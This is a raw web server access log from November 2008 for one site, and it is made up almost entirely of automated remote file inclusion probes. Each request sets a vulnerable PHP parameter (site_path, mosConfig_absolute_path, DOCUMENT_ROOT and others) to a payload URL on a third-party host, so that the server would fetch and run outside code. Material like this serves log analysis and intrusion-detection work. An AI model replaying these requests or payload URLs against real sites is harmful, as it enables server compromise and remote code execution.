65.55.211.31 - - [10/Nov/2008:09:41:04 -0800] "GET /tmp/sess_d8527ca25cbf04b1e4030b61da31062a HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:41:11 -0800] "GET /logs/access_080811.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:41:25 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:41:25 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:09:41:28 -0800] "GET /logs/access_080712.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:41:34 -0800] "GET /logs//?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:41:41 -0800] "GET /?path%5Bdocroot%5D=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 94989 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:41:47 -0800] "GET /logs/access_080717.log////////announcements.php?phpraid_dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:41:47 -0800] "GET ///////announcements.php?phpraid_dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [10/Nov/2008:09:41:48 -0800] "GET /logs////////announcements.php?phpraid_dir=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:09:42:04 -0800] "GET /logs/access_081009.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:09:42:04 -0800] "GET /logs/access_081030.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:09:42:04 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [10/Nov/2008:09:42:05 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://abesco.net/slpw/email/id.txt%0D?? HTTP/1.1" 200 95168 "-" "libwww-perl/5.63" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:10 -0800] "GET /logs/access_080329.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:10 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:10 -0800] "GET /logs/access_080602.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:12 -0800] "GET /logs/access_080329.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:12 -0800] "GET /logs/access_080329.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:12 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:12 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:12 -0800] "GET /logs/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:13 -0800] "GET /logs/access_080602.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:42:15 -0800] "GET /logs/access_080602.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:16 -0800] "GET /logs/access_080329.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:17 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:17 -0800] "GET /logs/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:18 -0800] "GET /logs/access_080602.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:18 -0800] "GET /atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:42:19 -0800] "GET /logs/access_080602.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:19 -0800] "GET /logs/access_080408.log/atom.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:42:26 -0800] "GET /logs/access_080228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:37 -0800] "GET /include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:37 -0800] "GET /logs//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:37 -0800] "GET /logs/access_081005.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:38 -0800] "GET /logs/access_080809.log//calendar.php?l=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:38 -0800] "GET /calendar.php?l=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:42:38 -0800] "GET /logs/access_080827.log//calendar.php?l=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:43 -0800] "GET /logs/access_080727.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:43 -0800] "GET /logs/access_081017.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:42:44 -0800] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
8.7.26.27 - - [10/Nov/2008:09:42:44 -0800] "GET /logs/access_080127.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [10/Nov/2008:09:42:44 -0800] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [10/Nov/2008:09:42:47 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [10/Nov/2008:09:42:49 -0800] "GET /logs/access_071221.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:51 -0800] "GET /logs/access_080801.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:09:42:51 -0800] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:52 -0800] "GET /logs/access_080914.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:42:58 -0800] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:43:04 -0800] "GET /logs/access_080718.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.24.84 - - [10/Nov/2008:09:43:04 -0800] "GET /logs/access_080904.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.101.40.54 - - [10/Nov/2008:09:43:24 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
118.101.40.54 - - [10/Nov/2008:09:43:25 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:43:28 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
118.101.40.54 - - [10/Nov/2008:09:43:29 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:43:30 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:43:34 -0800] "GET /logs/access_080918.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:43:51 -0800] "GET /logs/access_080530.log//index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:43:53 -0800] "GET /index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 200 95015 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:43:54 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:44:16 -0800] "GET /logs//calendar.php?l=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:44:16 -0800] "GET /calendar.php?l=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:44:17 -0800] "GET /logs/access_080911.log/index.php?option=com_content&task=§ionid=&id=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:44:17 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:44:17 -0800] "GET /index.php?option=com_content&task=§ionid=&id=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 95048 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:44:18 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:44:21 -0800] "GET /logs/access_080204.log/index.php?option=com_content&task=§ionid=&id=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:44:29 -0800] "GET /logs/access_081021.log//kboard.php?board=companynews&act=view&no=http://www.ducellier-avocats.eu/images_modif/New.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:44:29 -0800] "GET /kboard.php?board=companynews&act=view&no=http://www.ducellier-avocats.eu/images_modif/New.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:44:29 -0800] "GET /logs//kboard.php?board=companynews&act=view&no=http://www.ducellier-avocats.eu/images_modif/New.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:09:44:31 -0800] "GET /sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:44:32 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.72.255 - - [10/Nov/2008:09:44:36 -0800] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:45:20 -0800] "GET /logs/access_080404.log/book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:45:20 -0800] "GET /book.php5?page=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
24.186.170.229 - - [10/Nov/2008:09:46:01 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:09:46:11 -0800] "GET /logs/access_081002.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:46:15 -0800] "GET /logs/access_080602.log//?p=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:46:15 -0800] "GET /logs/access_080329.log//?p=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:46:15 -0800] "GET /logs//?p=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 73026 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:09:46:15 -0800] "GET /?p=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 94662 "-" "libwww-perl/5.814" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:09:46:30 -0800] "GET /logs//?_zb_path=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 200 73026 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:09:46:31 -0800] "GET /?_zb_path=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 200 94739 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:34 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:34 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:34 -0800] "GET /include/admin.lib.inc.php?site_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:44 -0800] "GET /logs/access_081005.log//include/admin.lib.inc.php?site_path=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:46:45 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:46 -0800] "GET /logs/access_080204.log/errors.php?error=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:46 -0800] "GET /errors.php?error=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:46 -0800] "GET /logs/errors.php?error=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:46:47 -0800] "GET /logs/access_080303.log/errors.php?error=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:46:49 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:46:50 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:46:56 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:46:56 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:46:57 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:46:57 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:46:57 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:46:57 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:00 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:05 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:06 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:10 -0800] "GET /logs/access_080428.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:47:10 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:10 -0800] "GET /calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:47:10 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:47:10 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:47:10 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.14.50 - - [10/Nov/2008:09:47:10 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.186.235 - - [10/Nov/2008:09:47:10 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:10 -0800] "GET /logs/access_080526.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:10 -0800] "GET /logs/access_080526.log//calendar.php?p=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:10 -0800] "GET /calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:11 -0800] "GET /logs//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [10/Nov/2008:09:47:11 -0800] "GET /logs/access_080912.log//calendar.php?pg=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
